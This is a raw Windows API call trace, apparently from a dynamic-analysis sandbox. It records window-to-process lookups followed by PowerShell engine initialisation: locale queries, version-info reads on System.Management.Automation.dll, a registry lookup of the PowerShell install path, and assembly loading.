	[0130.456] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x548
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x518
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x508
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4ec
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x44c
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7ec
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x324
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.457] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xcd0
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x10284, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc50
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x6024a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc4c
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x60242, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc48
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x9b4
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x8fc
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xbc0
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xb0
	[0130.458] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x804
	[0130.458] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xbc8
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x854
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x140
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x55c
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x34c
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xb40
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x988
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x868
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x850
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x830
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x814
	[0130.459] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x744
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x2a8
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x534
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5e4
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5c4
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x58c
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x238
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x584
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7e8
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x678
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x35c
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x51c
	[0130.460] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x360
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x274
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x588
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc8
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x21c
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x664
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x334
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5ec
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x550
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7a0
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x594
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x508
	[0130.461] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4ec
	[0130.462] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
	[0130.462] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7ec
	[0130.465] WerSetFlags () returned 0x0
	[0130.472] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0130.472] CoTaskMemFree (pv=0x0) 
	[0130.473] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x17e0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x17e0a0 | out: pulNumLanguages=0x17e0a8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x17e0a0) returned 1
	[0130.473] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x17e0a8, pwszLanguagesBuffer=0x2b666c0, pcchLanguagesBuffer=0x17e0a0 | out: pulNumLanguages=0x17e0a8, pwszLanguagesBuffer=0x2b666c0, pcchLanguagesBuffer=0x17e0a0) returned 1
	[0130.478] CoTaskMemAlloc (cb=0x24) returned 0x445540
	[0130.478] GetUserDefaultLocaleName (in: lpLocaleName=0x445540, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0130.478] CoTaskMemFree (pv=0x445540) 
	[0130.641] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0130.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.641] CoTaskMemFree (pv=0x42df80) 
	[0130.643] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0130.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.643] CoTaskMemFree (pv=0x42df80) 
	[0130.645] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0130.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.645] CoTaskMemFree (pv=0x42df80) 
	[0130.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.655] SetErrorMode (uMode=0x1) returned 0x1
	[0130.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x17dd20 | out: lpFileInformation=0x17dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0130.655] SetErrorMode (uMode=0x1) returned 0x1
	[0130.655] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x17df90 | out: lpdwHandle=0x17df90) returned 0x94c
	[0130.656] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b69f50 | out: lpData=0x2b69f50) returned 1
	[0130.657] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x17df08, puLen=0x17df00 | out: lplpBuffer=0x17df08*=0x2b69fec, puLen=0x17df00) returned 1
	[0130.657] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a0c8, puLen=0x17de70) returned 1
	[0130.657] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0130.657] CoTaskMemAlloc (cb=0x2e) returned 0x43d7a0
	[0130.657] lstrcpyW (in: lpString1=0x43d7a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0130.657] CoTaskMemFree (pv=0x43d7a0) 
	[0130.657] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a11c, puLen=0x17de70) returned 1
	[0130.657] lstrlenW (lpString="System.Management.Automation") returned 28
	[0130.657] CoTaskMemAlloc (cb=0x3c) returned 0x448b60
	[0130.657] lstrcpyW (in: lpString1=0x448b60, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0130.657] CoTaskMemFree (pv=0x448b60) 
	[0130.657] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a178, puLen=0x17de70) returned 1
	[0130.657] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0130.657] CoTaskMemAlloc (cb=0x20) returned 0x4455a0
	[0130.657] lstrcpyW (in: lpString1=0x4455a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0130.657] CoTaskMemFree (pv=0x4455a0) 
	[0130.657] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a1b8, puLen=0x17de70) returned 1
	[0130.658] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0130.658] CoTaskMemAlloc (cb=0x44) returned 0x448b60
	[0130.658] lstrcpyW (in: lpString1=0x448b60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0130.658] CoTaskMemFree (pv=0x448b60) 
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a220, puLen=0x17de70) returned 1
	[0130.658] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0130.658] CoTaskMemAlloc (cb=0x76) returned 0x3d3350
	[0130.658] lstrcpyW (in: lpString1=0x3d3350, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0130.658] CoTaskMemFree (pv=0x3d3350) 
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a2bc, puLen=0x17de70) returned 1
	[0130.658] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0130.658] CoTaskMemAlloc (cb=0x44) returned 0x448b60
	[0130.658] lstrcpyW (in: lpString1=0x448b60, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0130.658] CoTaskMemFree (pv=0x448b60) 
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a320, puLen=0x17de70) returned 1
	[0130.658] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0130.658] CoTaskMemAlloc (cb=0x58) returned 0x3fa610
	[0130.658] lstrcpyW (in: lpString1=0x3fa610, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0130.658] CoTaskMemFree (pv=0x3fa610) 
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a39c, puLen=0x17de70) returned 1
	[0130.658] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0130.658] CoTaskMemAlloc (cb=0x20) returned 0x4455a0
	[0130.658] lstrcpyW (in: lpString1=0x4455a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0130.658] CoTaskMemFree (pv=0x4455a0) 
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x2b6a044, puLen=0x17de70) returned 1
	[0130.658] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0130.658] CoTaskMemAlloc (cb=0x66) returned 0x443d00
	[0130.658] lstrcpyW (in: lpString1=0x443d00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0130.658] CoTaskMemFree (pv=0x443d00) 
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x0, puLen=0x17de70) returned 0
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x0, puLen=0x17de70) returned 0
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x17de78, puLen=0x17de70 | out: lplpBuffer=0x17de78*=0x0, puLen=0x17de70) returned 0
	[0130.658] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x17de48, puLen=0x17de40 | out: lplpBuffer=0x17de48*=0x2b69fec, puLen=0x17de40) returned 1
	[0130.658] CoTaskMemAlloc (cb=0x204) returned 0x3e8150
	[0130.658] VerLanguageNameW (in: wLang=0x0, szLang=0x3e8150, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0130.659] CoTaskMemFree (pv=0x3e8150) 
	[0130.659] VerQueryValueW (in: pBlock=0x2b69f50, lpSubBlock="\\", lplpBuffer=0x17de98, puLen=0x17de90 | out: lplpBuffer=0x17de98*=0x2b69f78, puLen=0x17de90) returned 1
	[0130.669] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x17dd68 | out: phkResult=0x17dd68*=0x304) returned 0x0
	[0130.670] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17dd2c, lpData=0x0, lpcbData=0x17dd28*=0x0 | out: lpType=0x17dd2c*=0x1, lpData=0x0, lpcbData=0x17dd28*=0x56) returned 0x0
	[0130.671] CoTaskMemAlloc (cb=0x5a) returned 0x443c90
	[0130.671] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x17dcfc, lpData=0x443c90, lpcbData=0x17dcf8*=0x56 | out: lpType=0x17dcfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x17dcf8*=0x56) returned 0x0
	[0130.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.843] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0130.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0130.843] CoTaskMemFree (pv=0x42df80) 
	[0131.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0131.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0131.563] CoTaskMemAlloc (cb=0x104) returned 0x42e090
	[0131.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.563] CoTaskMemFree (pv=0x42e090) 
	[0131.564] CoTaskMemAlloc (cb=0x104) returned 0x42e090
	[0131.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.565] CoTaskMemFree (pv=0x42e090) 
	[0131.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0131.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0132.086] CoTaskMemAlloc (cb=0x104) returned 0x42e090
	[0132.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.086] CoTaskMemFree (pv=0x42e090) 
	[0132.089] CoTaskMemAlloc (cb=0x104) returned 0x42e090
	[0132.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e090, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.089] CoTaskMemFree (pv=0x42e090) 
	[0132.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0132.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0133.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0133.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0133.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x17d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
